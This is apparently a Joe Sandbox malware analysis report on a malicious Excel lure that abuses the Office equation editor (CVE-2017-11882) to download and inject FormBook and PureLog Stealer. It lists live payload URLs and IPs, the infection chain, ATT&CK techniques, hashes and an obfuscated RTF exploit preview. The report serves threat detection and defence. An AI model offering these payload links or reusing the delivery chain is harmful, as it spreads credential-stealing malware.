                Source: C:\Users\user\AppData\Roaming\winiti.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A0101 rdtsc 9_2_009A0101
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00417A03 LdrLoadDll,9_2_00417A03
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00940080 mov ecx, dword ptr fs:[00000030h]9_2_00940080
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009400EA mov eax, dword ptr fs:[00000030h]9_2_009400EA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009626F8 mov eax, dword ptr fs:[00000030h]9_2_009626F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Roaming\winiti.exeMemory written: C:\Users\user\AppData\Roaming\winiti.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeQueries volume information: C:\Users\user\AppData\Roaming\winiti.exe VolumeInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 8.2.winiti.exe.5c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.5c0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.22f505c.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.22f505c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.450826441.00000000005C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.450903406.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 8.2.winiti.exe.5c0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.5c0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.22f505c.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.winiti.exe.22f505c.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.450826441.00000000005C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.450903406.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts33
                Exploitation for Client Execution                		1
                Browser Extensions                		111
                Process Injection                		1
                Masquerading                		OS Credential Dumping12
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scripting                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media14
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading                		Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                Process Injection                		NTDS1
                Remote System Discovery                		Distributed Component Object ModelInput Capture23
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482963 Sample: RFQ#51281AOLAI.xls Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 41 tny.wtf 2->41 51 Multi AV Scanner detection for domain / URL 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for dropped file 2->55 57 18 other signatures 2->57 8 EXCEL.EXE 57 41 2->8         started        signatures3 process4 dnsIp5 43 104.219.239.104, 49164, 49168, 80 DATAWAGONUS United States 8->43 45 tny.wtf 188.114.96.3, 49163, 49165, 80 CLOUDFLARENETUS European Union 8->45 29 C:\Users\user\...\RFQ#51281AOLAI.xls (copy), Composite 8->29 dropped 31 recreatednewthings...gstohappened[1].doc, Rich 8->31 dropped 12 WINWORD.EXE 337 37 8->12         started        17 winiti.exe 2 8->17         started        file6 process7 dnsIp8 47 tny.wtf 12->47 49 188.114.97.3, 49166, 49167, 80 CLOUDFLARENETUS European Union 12->49 33 C:\Users\user\AppData\Roaming\...\tny.wtf.url, MS 12->33 dropped 35 C:\Users\user\AppData\Roaming\...\dGa.url, MS 12->35 dropped 37 ~WRF{B2025738-BC6B...9-AAA2C3F993CF}.tmp, Composite 12->37 dropped 39 C:\Users\user\AppData\Local\...\B9D5C678.doc, Rich 12->39 dropped 63 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->63 65 Office viewer loads remote template 12->65 67 Microsoft Office drops suspicious files 12->67 19 EQNEDT32.EXE 12 12->19         started        69 Machine Learning detection for dropped file 17->69 71 Injects a PE file into a foreign processes 17->71 23 winiti.exe 17->23         started        file9 signatures10 process11 file12 25 C:\Users\user\AppData\Roaming\winiti.exe, PE32 19->25 dropped 27 C:\Users\user\AppData\Local\...\winiti[1].exe, PE32 19->27 dropped 59 Office equation editor establishes network connection 19->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->61 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ#51281AOLAI.xls18%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
                RFQ#51281AOLAI.xls20%VirustotalBrowse
                RFQ#51281AOLAI.xls100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.doc100%AviraHEUR/Rtf.Malformed
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\winiti.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe48%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                tny.wtf5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://104.219.239.104/80/winiti.execC:0%Avira URL Cloudsafe
                http://tny.wtf/0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exe0%Avira URL Cloudsafe
                http://tny.wtf/dGayX0%Avira URL Cloudsafe
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc0%Avira URL Cloudsafe
                http://104.219.239.104/80/winiti.exekkC:0%Avira URL Cloudsafe
                http://tny.wtf/dGa0%Avira URL Cloudsafe
                http://tny.wtf/5%VirustotalBrowse
                http://104.219.239.104/80/winiti.exe12%VirustotalBrowse
                http://104.219.239.104/80/winiti.exej0%Avira URL Cloudsafe
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc12%VirustotalBrowse
                http://tny.wtf/dGa4%VirustotalBrowse
                http://104.219.239.104/80/winiti.exej12%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                tny.wtf
                		188.114.96.3
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://104.219.239.104/80/winiti.exetrue
                • 12%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doctrue
                • 12%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://tny.wtf/dGatrue
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://tny.wtf/tny.wtf.url.3.drtrue
                • 5%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://tny.wtf/dGayX45930000.0.dr, ~DF2F5EA4D2F53E3BDB.TMP.0.drtrue
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.execC:EQNEDT32.EXE, 00000006.00000002.439733096.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exekkC:EQNEDT32.EXE, 00000006.00000002.439733096.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://104.219.239.104/80/winiti.exejEQNEDT32.EXE, 00000006.00000002.439733096.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
                • 12%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                104.219.239.104
                		unknownUnited States
                		27176DATAWAGONUStrue
                188.114.97.3
                		unknownEuropean Union
                		13335CLOUDFLARENETUSfalse
                188.114.96.3
                		tny.wtfEuropean Union
                		13335CLOUDFLARENETUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1482963
                Start date and time:2024-07-26 12:41:17 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 45s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:1
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:RFQ#51281AOLAI.xls
                Detection:MAL
                Classification:mal100.troj.expl.evad.winXLS@7/25@6/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 87%
                • Number of executed functions: 65
                • Number of non-executed functions: 60
                Cookbook Comments:
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer

                Warnings

                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                • Execution Graph export aborted for target EQNEDT32.EXE, PID 3316 because there are no executed function
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                06:42:48API Interceptor55x Sleep call for process: EQNEDT32.EXE modified
                06:42:51API Interceptor10x Sleep call for process: winiti.exe modified

                LLM Input / Output

                InputOutput
                URL: Office document Model: gpt-4o
                ```json
{
  "riskscore": 8,
  "reasons": "The screenshot contains a visually prominent image with the Microsoft Office logo and the text 'This document is protected'. This can mislead users into clicking on a potentially harmful link. The text creates a sense of urgency or interest by implying that the document is protected and needs to be accessed through a specific action. The impersonation of the well-known Microsoft Office brand adds to the credibility of the phishing attempt. The sense of urgency is directly connected to the prominent image, which likely serves as a link or button to a phishing page or malware download."
}

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                104.219.239.104RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104/80/winiti.exe
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104/54/winiti.exe
                188.114.97.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/4Gs
                Notepad3_v6.23.203.2.exeGet hashmaliciousAmadey, GO BackdoorBrowse
                • downloaddining2.com/h9fmdW6/index.php
                Quotation.exeGet hashmaliciousFormBookBrowse
                • www.bahisanaliz16.xyz/ty31/?nfuxZr=JoA2dMXfLBqFXt4x+LwNr+felGYfgJXJPNkjuKbt07zo6G2Rowrau43mkNbOTfffhSkjLsiciQ==&v6AxO=1bjHLvGh8ZYHMfZp
                LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                • www.whatareyoucraving.com/drbb/
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/pqv2p
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/vMCQY
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                188.114.96.3RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • tny.wtf/
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • tny.wtf/jjJsPX
                xptRc4P9NV.exeGet hashmaliciousUnknownBrowse
                • api.keyunet.cn/v3/Project/appInfo/65fc6006
                LisectAVT_2403002B_448.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
                LisectAVT_2403002B_89.exeGet hashmaliciousCobaltStrikeBrowse
                • cccc.yiuyiu.xyz/config.ini
                54.xlsGet hashmaliciousFormBookBrowse
                • tny.wtf/
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/3VC
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • tny.wtf/vb

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                tny.wtfRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 188.114.96.3
                #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                AVISO DE PAGO.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                PO S0042328241130.xlsGet hashmaliciousRemcosBrowse
                • 188.114.97.3
                Scan copy.xlsGet hashmaliciousUnknownBrowse
                • 188.114.97.3
                54.xlsGet hashmaliciousFormBookBrowse
                • 188.114.97.3
                Order_490104.xlsGet hashmaliciousUnknownBrowse
                • 188.114.96.3

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUShttps://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                • 172.67.159.233
                https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousUnknownBrowse
                • 104.21.72.79
                file.exeGet hashmaliciousUnknownBrowse
                • 104.21.72.79
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeamGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3
                DATAWAGONUSRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 104.219.239.104
                irlsever.docGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                54.xlsGet hashmaliciousFormBookBrowse
                • 104.219.239.104
                CATALOGUE.exeGet hashmaliciousRedLineBrowse
                • 172.81.131.198
                file.exeGet hashmaliciousCMSBruteBrowse
                • 104.219.232.59
                Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                1713283209b718b3402f0849bd96c1191ce385ad0742966accbbfb52b7b95b60820687e4a6909.dat-decoded.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                Vessel Details.exeGet hashmaliciousRemcosBrowse
                • 104.219.239.56
                https://login-no.dynv6.net/login/Get hashmaliciousUnknownBrowse
                • 172.81.131.76
                CLOUDFLARENETUShttps://intralinks.us.com/kI1A4RAsty2APhQ3Ea4DCmQ3E4DCI1Acalz01coTxmGet hashmaliciousHTMLPhisherBrowse
                • 172.67.159.233
                https://forms.office.com/r/WH4W8hyyNAGet hashmaliciousHTMLPhisherBrowse
                • 104.17.25.14
                SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeGet hashmaliciousSnake KeyloggerBrowse
                • 188.114.97.3
                file.exeGet hashmaliciousUnknownBrowse
                • 104.21.72.79
                file.exeGet hashmaliciousUnknownBrowse
                • 104.21.72.79
                RFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                • 188.114.96.3
                http://cognitoforms.com/Renato4/ManagementHasAddedYouToAWholeTeamGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                • 172.64.41.3
                file.exeGet hashmaliciousBabadedaBrowse
                • 172.64.41.3

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse
                  C:\Users\user\AppData\Roaming\winiti.exeRFQ#51281AOLAI.xlsGet hashmaliciousFormBook, PureLog StealerBrowse

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.025538895507565103
                    Encrypted:false
                    SSDEEP:6:I3DPcQrAPFvxggLRDSJXEairtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYPpuEaITvYg3J/
                    MD5:FE0601994EF97D876EDDAC6E461986B4
                    SHA1:0A64E0533D424530A70F3CAF9306F92E81AD3091
                    SHA-256:41C4AD17757703B6E5AC882A5539744BEC78AB94C8AD811160CEAF7418509097
                    SHA-512:F69CB62EC7AB0A565EE9B45E1E06F2658D9D147A079241D5E29812D4216142A96E05477AB44CD09BB0C7A5B9081F7E2972E5E1D4ACBF663509DF449B461DC027
                    Malicious:false
                    Reputation:low
                    Preview:......M.eFy...z9...5..L.R..V.%.S,...X.F...Fa.q.............................[kT.N.A.q...2v.........v..q..O.G.(...2.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Rich Text Format data, version 1
                    Category:dropped
                    Size (bytes):84055
                    Entropy (8bit):2.564253730925419
                    Encrypted:false
                    SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                    MD5:0A9C028203A8416BE8DB7371550D0FB5
                    SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                    SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                    SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                    Malicious:true
                    Yara Hits:
                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, Author: ditekSHen
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Reputation:low
                    Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):951296
                    Entropy (8bit):7.752827643333699
                    Encrypted:false
                    SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                    MD5:1F5C95D40C06C01300F0A6592945A72D
                    SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                    SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
